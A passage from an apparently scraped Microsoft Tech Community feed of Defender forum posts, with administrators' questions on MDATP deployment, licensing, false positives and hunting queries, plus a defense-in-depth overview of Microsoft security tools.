NDR) are being used in concert with Defender for Endpoint. The active mode scanning may generate alerts in those systems. To prevent Defender for Endpoint’s active scanning from being detected as a threat customers can implement exclusions in any applicable&nbsp;3rd party systems to ignore the scanning which has been carefully tuned to have negligible network impact. Information on how to configure the exclusion can be found<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener nofollow noreferrer">here</A>.</P><P>&nbsp;</P><P>Thank you for your participation in the Defender for Endpoint pubic preview. More information about Endpoint Discovery can be found in the following resources:</P><P>&nbsp;</P><UL><LI>Blog:<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener nofollow noreferrer">Secure unmanaged devices with Microsoft Defender for Endpoint now</A></LI><LI>Technical Blog:<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener nofollow noreferrer">Technical drill down on Endpoint Discovery</A></LI><LI>Docs:<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener nofollow noreferrer">Device Discovery Overview</A></LI><LI>FAQ:<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener nofollow noreferrer">Device Discovery Frequently Asked Questions</A></LI></UL><P>&nbsp;</P><P>Thanks,</P><P>Chris Hallum</P><P>Senior Product Manager</P><P>M365 Security</P><P>Microsoft Corporation</P></DIV></DIV> Sat, 08 May 2021 20:34:52 GMT Deleted 2021-05-08T20:34:52Z MDATP apt-get install fails Ubuntu 21.04 <P>We are trying to install and test MDATP on Ubuntu 21.04. The installation fails at the install. If I swap with any other package the install starts fine. After digging into the files it looks like maybe MDATP is missing from the Contents-amd64.gz at&nbsp;<A href="#" target="_blank" rel="noopener"></A></P><P>&nbsp;</P><P>Note the size difference from 20.10 to 21.04</P><P>Also, the 21.04 contents contains zero references to MDATP or the opt folder</P><P>&nbsp;</P><P>$ sudo apt-get install mdatp<BR />Reading package lists... Done<BR />Building dependency tree... Done<BR />Reading state information... Done<BR /><STRONG>E: Unable to locate package mdatp</STRONG></P><P>&nbsp;</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="JBUB_Arbala_0-1619718455705.png" style="width: 400px;"><img src=";px=400" role="button" title="JBUB_Arbala_0-1619718455705.png" alt="JBUB_Arbala_0-1619718455705.png" /></span></P><P>&nbsp;</P> Fri, 30 Apr 2021 02:07:56 GMT JBUB_Arbala 2021-04-30T02:07:56Z Perform Advanced Hunting queries with Kusto Explorer? <P>Hello all,</P><P>&nbsp;</P><P>I have recently used Kusto Explorer with a project with Azure Data Explorer and I really liked the tool.</P><P>I would like to connect with it to Microsoft 365 Defender to perform Advanced Hunting queries from that tool. Does anyone know if it is possible?&nbsp;</P><P>&nbsp;</P><P><A href="#" target="_blank"></A></P> Wed, 14 Apr 2021 12:07:37 GMT joaogcosta 2021-04-14T12:07:37Z Investigating Failed AIR <P>My client has Investigataions with a status of partially remediated and the message "<SPAN>A problem prevented the remediation of some malicious entities." I have opened a support ticket, but I"m not getting any help from them. Has anyone else seen this or have any idea how to investigate?</SPAN></P><P>&nbsp;</P> Sat, 10 Apr 2021 17:54:34 GMT Dean Gross 2021-04-10T17:54:34Z Microsoft Azure and Microsoft 365 Security - my defense in depth strategy! <P>&nbsp;</P> <P>Dear Microsoft Azure and Microsoft 365 security friends,</P> <P>&nbsp;</P> <P>Who is interested in my (small) company? We don't have anything to protect and we don't have any money. Besides, we have a firewall. Furthermore, Mr. Wechsler, you are a bit paranoid with your security thinking.</P> <P>&nbsp;</P> <P>These are the first sentences I always hear when it comes to IT (Cloud) security. But the attacker is also interested in a small company and that is to use their system as a bot.</P> <P>&nbsp;</P> <P>It's not always about money and data. What about the reputation a company has to lose? It takes years to build a good reputation but only one event to damage the reputation. What about the employees, the trust in the company? Do you want to put this at risk as a company, I don't think so!</P> <P>&nbsp;</P> <P>Yes! Extended protection mechanisms always cost extra, I am absolutely aware of that. But I also pay monthly for car insurance and accident and health insurance. I'm grateful every day when I don't need the insurance. That's exactly how it should feel when it comes to IT (cloud) security.</P> <P>&nbsp;</P> <P>Let's start with my IT/Cloud security strategy. I am absolutely aware that this list is not exhaustive. There are so many components to consider, plus every infrastructure/company is always different. I'll try to give you a little help here.</P> <P>&nbsp;</P> <P>We start with Microsoft 365, as a first additional measure, use all policies that start with "Anti-". You can find all the information in the Microsoft 365 Security Center.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P>The next step is to use the policies that start with "Safe". You can also find this information in the Microsoft 365 Security Center.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Bild_1.JPG" style="width: 200px;"><img src=";px=200" role="button" title="Bild_1.JPG" alt="Bild_1.JPG" /></span></P> <P>Multi factor authentication is a key element to further protect your identities/users. You can set this up per user or with a Conditional Access Policy (my preferred way). Azure Active Directory helps you integrate this protection.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Bild_2.JPG" style="width: 400px;"><img src=";px=400" role="button" title="Bild_2.JPG" alt="Bild_2.JPG" /></span></P> <P>&nbsp;</P> <P>If you are subject to a regulatory agency, the Microsoft 365 Compliance Center can help.&nbsp;Here you can set up data loss prevention policies, audits, eDiscovery and much more.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Bild_3.JPG" style="width: 400px;"><img src=";px=400" role="button" title="Bild_3.JPG" alt="Bild_3.JPG" /></span></P> <P>&nbsp;</P> <P>In this day and age of bring your own device and work from home, it's a good idea to include the Endpoint Manager. With it you have the possibility to manage endpoints (Mobile Device Management - MDM) and applications (Mobile Application Management - MAM).<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P>Get visibility into your cloud apps using sophisticated analytics to identify and protect against cyberthreats, detect Shadow IT, and control how your data travels.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Bild_4.JPG" style="width: 229px;"><img src=";px=400" role="button" title="Bild_4.JPG" alt="Bild_4.JPG" /></span></P> <P>The Cloudapp Security Portal provides you with the best possible support. Here you can allow or sanction cloud app, configure anti-ransomware policies, data loss prevention policies and much more.</P> <P>&nbsp;</P> <P>Do you want to know how your Windows Active Directory is doing? Then Microsoft Defender for Identity will help you. With this tool you can transfer the local information to the cloud. With an interface to the CloudApp Security Portal.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Bild_5.JPG" style="width: 400px;"><img src=";px=400" role="button" title="Bild_5.JPG" alt="Bild_5.JPG" /></span></P> <P>&nbsp;</P> <P>No person should always work with elevated rights. Only work with elevated rights when it is really necessary. This is where Azure Privileged Identity Management (PIM) comes in. With this tool you can configure the access as you need it for your needs.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Bild_6.JPG" style="width: 367px;"><img src=";px=400" role="button" title="Bild_6.JPG" alt="Bild_6.JPG" /></span></P> <P>With Azure Identity Protection do you have a tool that allows organizations to accomplish three key tasks:</P> <P>1. Automate the detection and remediation of identity-based risks.<BR />2. Investigate risks using data in the portal.<BR />3. Export risk detection data to third-party utilities for further analysis.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Bild_7.JPG" style="width: 251px;"><img src=";px=400" role="button" title="Bild_7.JPG" alt="Bild_7.JPG" /></span></P> <P>&nbsp;</P> <P>Just in time access for administrators, this is also possible for virtual machines with Just in time VM Access. In Azure Security Center you can configure this feature (and much more).</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Bild_8.JPG" style="width: 400px;"><img src=";px=400" role="button" title="Bild_8.JPG" alt="Bild_8.JPG" /></span></P> <P>Azure Sentinel helps you keep track of the health of your organization. A SIEM (Security Information and Event Management) and SOAR (Security Orchestration Automation and Response) tool that should not be missing from your portfolio. The tool offers many connectors (98 at the moment) so that you can connect the most diverse portals to Sentinel.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Bild_9.JPG" style="width: 400px;"><img src=";px=400" role="button" title="Bild_9.JPG" alt="Bild_9.JPG" /></span></P> <P>&nbsp;</P> <P>There is still so much to show, I wasn't talking about Role Based Access Control (RBAC) now or Network Security Group (NSG), etc. I know some of you are thinking, hey there is a lot more. I am aware of that. My goal is to give you some positive signals on how you can integrate additional security into your organization.</P> <P>&nbsp;</P> <P>Thank you and kind regards, Tom Wechsler</P> <P>&nbsp;</P> Sat, 25 Sep 2021 13:35:55 GMT TomWechsler 2021-09-25T13:35:55Z Microsoft defender for Endpoint network best practices <P>Any best practices out there around network configuration of MDE for Windows Server workloads in AWS and Azure. Also, should networking settings differ based on server workload i.e. database server or SAP application vs domain controller.</P><P>&nbsp;</P><P>&nbsp;</P> Fri, 12 Mar 2021 02:53:15 GMT Gurdev Singh 2021-03-12T02:53:15Z MDATP for servers pre-requisites <P>Anyone know if Configuration Manager is required to deploy and manage Defender ATP Antivirus on Windows and Linux servers.&nbsp;</P><P>&nbsp;</P><P>I know Intune can be used to manage Windows 10 devices. However, my question is specifically for servers using MDATP antivirus.</P> Mon, 08 Mar 2021 00:00:07 GMT Gurdev Singh 2021-03-08T00:00:07Z Using watchlist in Defender <P>Is there any way to use a watchlist in any of the Defender products like we can in SentineL?</P> Sat, 06 Mar 2021 17:16:26 GMT Dean Gross 2021-03-06T17:16:26Z Operational Procedures <P>One of my clients would like to have a set of operational procedures to give to new people that define the action items that should be done every day/week/month in the Defender suite. Has anyone created anything like this that they are willing to share?</P><P>TIA</P><P>Dean</P> Mon, 22 Feb 2021 14:18:46 GMT Dean Gross 2021-02-22T14:18:46Z Microsoft Defender for Mac <P>Have a 365 account which I use for work and would like to install defender on my personal macbook pro (which I use for work)</P><P>&nbsp;</P><P>Why am I having so much trouble figuring out where and how to download/install it?</P> Sun, 21 Feb 2021 16:53:01 GMT Badlamb 2021-02-21T16:53:01Z Where to start? <P>Hello,</P><P>&nbsp;</P><P>where to start to understand how the various pillars of Defender works? How to understand in what mode create a pilot? Training?</P><P>For example, I want to start to use Defender for Office 365, I have users with M365 Basic and Standard Business subscriptions, so I have to add it as add on, but: could I add it on some users and then remove after the tests?&nbsp;</P><P>Also, I know that I can add Defender for Endpoint for my subscriptions, but where I find prices for this for M365 Business subscriptions (I found only for enterprises subscriptions).</P><P>&nbsp;</P><P>Marco</P> Fri, 05 Feb 2021 20:45:19 GMT Marco Mangiante 2021-02-05T20:45:19Z Automatic investigations are failing <P><SPAN>my client is seeing many failed AIR jobs in the Investigations page. These are typically for "Mail with malicious user is zapped" investigations. Has anyone else seen this? any idea why it would be occurring?</SPAN></P> Wed, 20 Jan 2021 21:10:46 GMT Dean Gross 2021-01-20T21:10:46Z Microsoft Credential Guard pop up after activating <P><SPAN>I activated credential guard on windows 10 1909 on multiple machines all of them now have a blank security pop up that repeatedly comes back. How do I stop this from happening?&nbsp;</SPAN></P><DIV class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="security pop up.png" style="width: 233px;"><img src=";px=999" role="button" title="security pop up.png" alt="security pop up.png" /></span></P> Thu, 14 Jan 2021 14:42:05 GMT Hello1905 2021-01-14T14:42:05Z Safe attachment policy Have we have any sample malicious attachments to test the deployed ATP safe attachment policy. Thu, 14 Jan 2021 11:10:15 GMT Rahul_Parmar 2021-01-14T11:10:15Z Virus Detection <P>Hi every one.</P><P>I have serious concern about my privacy and I believe my laptop and phone contain some virus how can I discover that .</P><P>Windows defender told me your computer runs normal even my motile app told me no threat.</P><P>I hope you can help me to discover these threats and solve these concern.</P><P>&nbsp;</P> Thu, 24 Dec 2020 00:23:20 GMT Blila 2020-12-24T00:23:20Z Internal DOS commands in Advanced Hunting <P>Hello,</P><P>&nbsp;</P><P>Is there a way to detect internal DOS commands in Advanced Hunting? For example, commands (in cmd.exe or PowerShell) like "cd" or "type" are internal and don't have any executable (unlike ping.exe). is there a way to track those commands?</P><P>&nbsp;</P><P>Best regards</P> Thu, 03 Dec 2020 20:40:32 GMT vboucher 2020-12-03T20:40:32Z Intune + Defender features <P>How to integrate defender &amp; Intune</P><P>What benefits are there in defender?</P> Wed, 25 Nov 2020 16:28:16 GMT urskarthik83 2020-11-25T16:28:16Z What's we can do if we cannot cover full M365 Defender platform (threat protection platform)? <P>Hi team,</P> <P>&nbsp;</P> <P>I'm curious with M365 Defender, it's a Cybersecurity platform and fully benefits when we have all Defender components/services as below:</P> <OL> <LI>Microsoft Defender for Endpoint</LI> <LI>Microsoft Defender for Office 365</LI> <LI>Microsoft Defender for Identity</LI> <LI>Microsoft Cloud App Security</LI> </OL> <P>So, what's happen if we cannot fully purchased above components. Assuming some components and not fully covered.</P> <P>&nbsp;</P> <P>For example, if we only purchased Defender for identity and MCAS. What's limitation and scoping for manage in Threat protection portal ?</P> <P>&nbsp;</P> <P>Highly appreciate your sharing experience/advice for this case.</P> <P>&nbsp;</P> <P>Thanks</P> Tue, 24 Nov 2020 15:27:23 GMT HuyPham-VN 2020-11-24T15:27:23Z query MC226683 Secure by Default - honoring ATP detonations <P>Under&nbsp;MC226683, Exchange Online Anti-spam policies and Safe Sender policies will no longer exempt listed senders of mail stopped as high-confidence phishes.</P><P>&nbsp;</P><P>1) Should any questions on this topic be asked here, or over in the Exchange community? The Product Formerly Known as ATP has always seemed to fall somewhere between the two.</P><P>&nbsp;</P><P>2) Assuming this is the right forum, do we know what action the product will take now that exemptions are not allowed for high-confidence phish?</P><P>&nbsp;</P><P>3) Assuming a particular sender persistently ends up being detained as a high-confidence phisher by the product and we can see that there is no problem with the mail, what precisely are we supposed to do?</P> Mon, 16 Nov 2020 16:22:08 GMT ExMSW4319 2020-11-16T16:22:08Z Microsoft 365 Security - MSSP <P>Hi,</P><P>&nbsp;</P><P>is it possible to access the customer's Microsoft 365 Security portal (<A href="#" target="_blank"></A>) as an MSSP?</P><P>In a similar way as one can access the customer's MS Defender for Endpoint portal by providing the tenant ID (<A href="#" target="_blank"></A>).</P><P>&nbsp;</P><P>Kind regards,</P><P>Jan</P><P>&nbsp;</P> Mon, 09 Nov 2020 14:38:31 GMT jcescut 2020-11-09T14:38:31Z Does MS Defender with ATP require Intune? <P>Background:</P><UL><LI>Our objective is for all Windows endpoints to have Microsoft Defender with ATP installed.</LI><LI>Environment has workstations and laptops.</LI><LI>All workstations and some laptops (specific use case) will not be enrolled in Intune.</LI><LI>The workstations will be managed through SCCM. The “specific use case laptops” will not have centralized configuration management.</LI></UL><P>&nbsp;</P><P>Question:</P><UL><LI>Does MS Defender with ATP require Intune?</LI><LI>If it does not, would this change how the product is managed?</LI></UL> Tue, 13 Oct 2020 21:34:10 GMT Kevin Watkins 2020-10-13T21:34:10Z M365 Defender ATP - manual run antivirus scan for a device starts very slow <P>Hi Everyone,</P><P>&nbsp;</P><P>I have the problem that when I want to manually start an antivirus scan over the Microsoft Defender Security Center on a specific device, it takes a very long time (sometimes up to one hour) before the scanjob really starts.</P><P>&nbsp;</P><P>Does anyone have an idea what I can do to make the scan start immediately on the client when I start the scan job?</P><P>&nbsp;</P><P>Thanks in advance</P><P>&nbsp;</P><P>Kind Regards<BR />Marvin Peters</P> Wed, 07 Oct 2020 13:24:01 GMT mpeters_all41 2020-10-07T13:24:01Z What's the deal with Adobe? <P>Every single investigation shows Adobe products listed as suspicious, which seems like it's the default.&nbsp;</P><P>Other than it being a quarrel amongst the two companies, is there a justified reason for this (I am sure I am not the only person to notice).&nbsp;</P><P>&nbsp;</P><P>MSFT - I don't like everything Adobe does either, but listing it as suspicious isn't fair to your user base if it's unwarranted. Please address or advise.</P><P>&nbsp;</P> Mon, 05 Oct 2020 14:13:40 GMT Jonathan Green 2020-10-05T14:13:40Z Onboard Linux Machines on MDATP <P>Hi Techs,&nbsp;</P><P><BR />I would like to Onboard Linux Machines on MDATP but the local script is mentioned for up to&nbsp; 10 devices . How do we onboard more than 10 devices manually ? Any suggestions ?</P><P>&nbsp;</P><P><A href="#" target="_blank"></A></P> Mon, 28 Sep 2020 14:17:20 GMT SathishKumarPatchaiappan 2020-09-28T14:17:20Z Microsoft Defender Endpoint standalone license <P>Hi All,</P><P>&nbsp;</P><P>Just want to check if before I go and purchase the standalone license for MS Defender Endpoint.</P><P>does this license include the following-</P><P>1. Endpoint DLP</P><P>2. Protection in Edge</P><P>3. Microsoft Managed Desktop.</P><P>&nbsp;</P><P>currently, we have E3 license.</P><P>&nbsp;</P><P>thanks!!!!</P> Fri, 25 Sep 2020 07:40:10 GMT ricksj 2020-09-25T07:40:10Z Malware/Threat TrojanSpy:MSIL/AgentTesla.AQ!MTB: False positive? <P>Hello!</P><P>Windows Defender (Windows 10 Pro x64 v1909 build 18363.1016)<SPAN>&nbsp;</SPAN><STRONG>has blocked 3 times</STRONG><SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener">AgentTesla malware</A>&nbsp;on a dual-boot machine (with Linux Mint 19.2 x64). As you may see in the picture below ,<STRONG>it does not say from&nbsp;</STRONG><U><EM>where&nbsp;</EM></U><STRONG>it was removed.</STRONG></P><DIV class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="AgentTesla2.png" style="width: 520px;"><img src=";px=999" role="button" title="AgentTesla2.png" alt="Windows Defender snapshot" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Windows Defender snapshot</span></span></P><P>&nbsp;</P><P>In my own research I could find that AgentTesla is one of those<SPAN>&nbsp;</SPAN><STRONG>malware which ste</STRONG><STRONG>al and transmit/disclose user info</STRONG><SPAN>&nbsp;</SPAN>and as well as acts as<SPAN>&nbsp;</SPAN><STRONG>gateway for ransomware</STRONG>. It is a<SPAN>&nbsp;</SPAN><SPAN>.NET-based malware</SPAN>.</P><P>&nbsp;</P><P>Microsoft says that "<A href="#" target="_blank" rel="noopener">Windows Defender Antivirus detects and removes this threat.</A>". Nonetheless,&nbsp;<STRONG><SPAN>&nbsp;</SPAN>I have done my best to find and remove it but I was<SPAN>&nbsp;</SPAN><SPAN>not successful</SPAN></STRONG>. I have employed:</P><P class="lia-indent-padding-left-30px"><BR />Windows Defender, which has been run in quick, full, custom (c:\ only) &amp; offline modes;<BR />Microsoft Safety Scanner;<BR />Linux: clamav (from Cisco), running twice with and without the extra unofficial malware signatures;<BR />Bootable Rescue Disks (.iso) from Norton, Trend Micro and Avira.<BR />Windows-based tools Norton Power Eraser and Trend Micro tool.</P><P><BR />As I have aforementioned, none of them have found it (okay, it may have been indeed removed).</P><P>&nbsp;</P><P>I would like to know if those notifications could be some sort of<SPAN>&nbsp;</SPAN><STRONG>false positive</STRONG>. I have never received what seems to be a false positive notification from Microsoft Defender. It have to admit it has startled me.&nbsp;Moreover, may I render this machine as clean?</P><P>&nbsp;</P><P>As usual, all signatures / virus intelligence were updated before scanning.</P><P>Thank you,</P><P>Sandro</P><P>&nbsp;</P><P><STRONG>References:</STRONG></P><P><A href="#" target="_blank" rel="noopener"></A></P><P><A href="#" target="_blank" rel="noopener"></A></P><P><A href="#" target="_blank" rel="noopener">;action=showpdf</A></P><P>&nbsp;</P> Mon, 21 Sep 2020 15:21:30 GMT sandro 2020-09-21T15:21:30Z Manage security alerts in Microsoft 365 security center(MTP), Sentinel or separately? <P>I am having some questions and would like to receive opinions that can contribute.</P><P>&nbsp;</P><P>I have the solutions in my environment and I'm in doubt about how to centralize everything.</P><P>&nbsp;</P><P>I have Azure Sentinel receiving the Defender Atp, MCASB, Azure ATp, Office 365 ATp logs, among others.</P><P>&nbsp;</P><P>I also have MCAS integrated with Azure ATP.</P><P>&nbsp;</P><P>The question is. Where should all technologies be centralized?</P><P>&nbsp;</P><P>That is, if I use Microsoft 365 Security Center to centralize Defender ATP, Azure ATP, MCAS and Office ATP, does it still make sense to receive these logs in Sentinel?</P><P>&nbsp;</P><P>Would it be possible to integrate alerts generated in Sentinel with Microsoft 365 Security Center?</P><P>&nbsp;</P><P>If I receive the solution logs on Sentinel, what would be the meaning of Microsoft 365 Security Center? Can I work with both, centralizing the solutions in both?</P><P>&nbsp;</P><P>I know that there may not be a final answer, but I would be happy to get your position.</P><P>&nbsp;</P><P>Thank you.</P> Tue, 15 Sep 2020 20:43:16 GMT luizao_lf 2020-09-15T20:43:16Z Desperate for help... ATP classified our domain as malicious by mistake and that's destroying us <P class="">Since Saturday, every time anyone with Microsoft ATP enabled clicks on a link from our domain, safe links blocks it and tells them that our site is malicious (which it's not).</P><P>&nbsp;</P><P>Our domain is marked as safe on all the other security providers we've found. Only Microsoft Advance Thread Protection is blocking it.</P><P>&nbsp;</P><P>There has to be a way for Microsoft to fix the issue on their block domain list inside ATP (safelinks).</P><P><SPAN>With so many Office 365 users in B2B,&nbsp;blocking and pointing a safe company's domain as malicious by mistake causes a really big problem for that company and can cost serious, irreparable damage to it.&nbsp;</SPAN><BR /><BR />This situation is really hurting our business at a deep level.</P><P>&nbsp;</P><P>Can anyone help please?<BR /><BR />Thanks!</P> Mon, 14 Sep 2020 16:27:31 GMT jmadriz 2020-09-14T16:27:31Z Switch TimeZone UTC to my local Timezone <P>Hi All,&nbsp;&nbsp;</P><P>This is the first time I have to investigate a security incident by Defender ATP portal.</P><P>Nice insight BUT I see when I want to check for particular time frame this is in UTC.</P><P>&nbsp;</P><P>At this moment I see my message:&nbsp; <SPAN>Your content was last auto-saved at 09:08 AM&nbsp; &nbsp;but now in Amsterdam it is 18:08</SPAN></P><P>&nbsp;</P><P>What I see normally, I can adjust my profile to timezone. The data I see is also reallity the time I need to explore.</P><P>&nbsp;</P><P>Question:</P><P>1) Where can I switch this portal to local time to be able to search for the correct data.</P><P>2) If this is not possible the data collected&nbsp;@ Laptop, what is the timeframe I should select to see the data from device between 08:00 CET and 09:00 CET ?</P><P>&nbsp;</P><P>thanks</P><P>Jan&nbsp;</P><P>&nbsp;</P><P>&nbsp;</P><P>&nbsp;</P><P>&nbsp;</P> Fri, 11 Sep 2020 16:18:59 GMT jgswinkels-C 2020-09-11T16:18:59Z How to Deal with Undetected Malware? <P>Hi,</P><P>&nbsp;</P><P>Anti-Malware products like Windows Defender are getting smarter and stronger and it is not easy to find malware which won't be detected by them. In case we face such a case, we will send them to Microsoft Anti-Malware team for analyze and we do have have other defensive layers.</P><P>&nbsp;</P><P>I am just wondering during the 0-days period where we are waiting for signature and we face undetected malware, how you are dealing with it and protect your enviroments?</P><P>&nbsp;</P><P>Let me share some clue:</P><P>&nbsp;</P><P>1) Use AppLocker to block them manually</P><P>2) Write some emergency PowerShell scripts</P><P>3) Isolate infected device</P><P>4) Implement some emergency policies</P><P>&nbsp;</P><P>In case, we ATP is available, it would be much easier, but let say how we handle it without ATP (consider complex scenario) and then we discuss about using ATP (as easy scenario)</P><P>&nbsp;</P><P>I am interested to hear what you think.&nbsp;</P> Sat, 08 Aug 2020 13:38:26 GMT Reza_Ameri-Archived 2020-08-08T13:38:26Z Automate pending actions <P>In the Action Center I would like to automatically reject the pending actions "Block URL" and "Soft delete emails".&nbsp;<SPAN>I know this is not natively supported, but is there way to automate this using PowerShell, Power Automate, Security Graph API or something else?</SPAN></P> Thu, 06 Aug 2020 17:12:29 GMT Joachim83 2020-08-06T17:12:29Z Share Your Hunting Challenges! <P>Hello world!&nbsp;<LI-USER uid="104809"></LI-USER>&nbsp;and I would love your input on anything you would like demo'ed in future webcasts! Want to see us demonstrate a specific hunting capability? Got a query challenge on your mind? Reply with your idea or like a reply from the community - we'll pick some of the popular ideas and put together future webcasts on the topics.</P> <P>&nbsp;</P> <P>Also, if you are looking for a great introduction to advanced hunting in MTP and KQL, be sure to check out our four part series Tracking the Adversary at&nbsp;<A href="#" target="_blank" rel="noopener"></A>, or download the query files to practice on your own MTP instance at <A href="#" target="_blank" rel="noopener"></A>.&nbsp;</P> <P>&nbsp;</P> <P>Happy hunting!</P> <P>&nbsp;</P> <P>&nbsp;</P> Wed, 05 Aug 2020 13:53:21 GMT MichaelJMelone 2020-08-05T13:53:21Z Can you help me in this query let minTimeRange = ago(7d);<BR />let outlookLinks =<BR />DeviceEvents<BR />| where Timestamp &gt; minTimeRange and ActionType == "BrowserLaunchedToOpenUrl" and<BR />isnotempty(RemoteUrl)<BR />| where<BR />InitiatingProcessFileName =~ "outlook.exe"<BR />or InitiatingProcessFileName =~ "runtimebroker.exe"<BR />| project Timestamp , DeviceId , DeviceName , RemoteUrl, InitiatingProcessFileName,<BR />ParsedUrl=parse_url(RemoteUrl)<BR />| extend WasOutlookSafeLink=(tostring(<A href="#" target="_blank">http://ParsedUrl.Host</A>) endswith "<A href="#" target="_blank"></A>")<BR />| project Timestamp , DeviceId, DeviceName , WasOutlookSafeLink,<BR />InitiatingProcessFileName,<BR />OpenedLink=iff(WasOutlookSafeLink, url_decode(tostring(ParsedUrl["QueryParameters"]["url"])), RemoteUrl);<BR />let alerts =<BR />AlertInfo<BR />| summarize (FirstDetectedActivity, Title)=argmin(Timestamp,Title) by AlertId,<BR />| where FirstDetectedActivity &gt; minTimeRange;<BR />alerts<BR />| join kind=inner (outlookLinks) on DeviceId<BR />| where FirstDetectedActivity -<BR />Timestamp between (0min..3min)<BR />| summarize FirstDetectedActivity=min(FirstDetectedActivity),<BR />AlertTitles=makeset(Title) by OpenedLink, InitiatingProcessFileName,<BR />EventTime=bin(Timestamp, 1tick), DeviceName, DeviceId , WasOutlookSafeLink<BR /><BR />links opened from outlook.exe, followed by warning that was ignored by the user.<BR /><BR /> Mon, 03 Aug 2020 10:24:18 GMT Shviam 2020-08-03T10:24:18Z Notifications of new MTP incidents? <P>Hi all!</P><P>&nbsp;</P><P>Finding MTP extremely useful in incident detections and investigations, it certainly beats doing alert correlation yourself.</P><P>&nbsp;</P><P>Is there any way to trigger an email or any kind of notification when a new Incident is detected/created by MTP in the Security Portal? I'd like incidents to trigger a ticket in our service desk system which simply listens to a mailbox.</P><P>&nbsp;</P><P>I can't seem to find any documentation on this under the MTP doco?</P><P>&nbsp;</P><P>Any help would be greatly appreciated.</P><P>&nbsp;</P><P>Kind regards,</P><P>Nathan Manzi</P> Mon, 03 Aug 2020 04:23:19 GMT thehadricus 2020-08-03T04:23:19Z No email queries available <P>First of all: Thanks for the great webinars about MTP/Sentinel etc.</P><P><BR />I hope my question is right here.</P><P><BR />We use an E5 license in the company.</P><P>But the MTP does not offer me the possibility to check emails. All options that refer to mails are not offered to me.<BR />Unfortunately I can't find a check mark to activate this area (or I don't know in which portal I should find it)<BR />I'm pretty sure that I could see the corresponding menu items last week.<BR /><BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="2020-07-29_18h25_21.png" style="width: 545px;"><img src=";px=999" role="button" title="2020-07-29_18h25_21.png" alt="2020-07-29_18h25_21.png" /></span></P> Wed, 29 Jul 2020 16:32:23 GMT Jan_F1801 2020-07-29T16:32:23Z MDATP KQL Query isolated machines <P>How would you write the Hunting query to identify machiens that have been isolated via MDATP?</P><P>&nbsp;</P><P>Thanks,</P><P>&nbsp;</P><P>Andrew</P><P>&nbsp;</P> Wed, 29 Jul 2020 15:53:05 GMT agattsek 2020-07-29T15:53:05Z Submit Sample of Malicious Files to Microsoft <P>Microsoft Anti-Malware engine is very powerful and with technologies like Cloud Protection, Behavior Monitoring ,... . It is&nbsp;<STRONG>not&nbsp;</STRONG>easy for malware to bypass it. However, like any other security products and antimalware technology. There might&nbsp;be possibility of malware which won't get detected by Microsoft Anti-Malware product.&nbsp;</P><P>In this case, make sure submit it to Microsoft Anti-Malware team for analysis. It is good idea to login with your Microsoft Account so you could keep track of your submission and also follow up with Microsoft. You could submit sample here:</P><P><A href="#" target="_blank"></A>&nbsp;</P><P>In this website, you may also report incorrect detection where something is safe but incorrectly detects as malicious. By submit sample, you are not only protection your company, but you make Microsoft Anti-Malware engine smarter and stronger and this way you will protect millions of users and organizations globally.</P> Mon, 27 Jul 2020 15:17:51 GMT Reza_Ameri-Archived 2020-07-27T15:17:51Z Getting the community started <P>This is cool, I've been contributing to the MS Tech Community for years, but have never had the chance to be the first person to post in a new group.&nbsp;</P><P><BR />My question to everyone is, when looking for threats, which tool, platform, center do you start with and why?</P> Thu, 02 Jul 2020 14:11:59 GMT Dean Gross 2020-07-02T14:11:59Z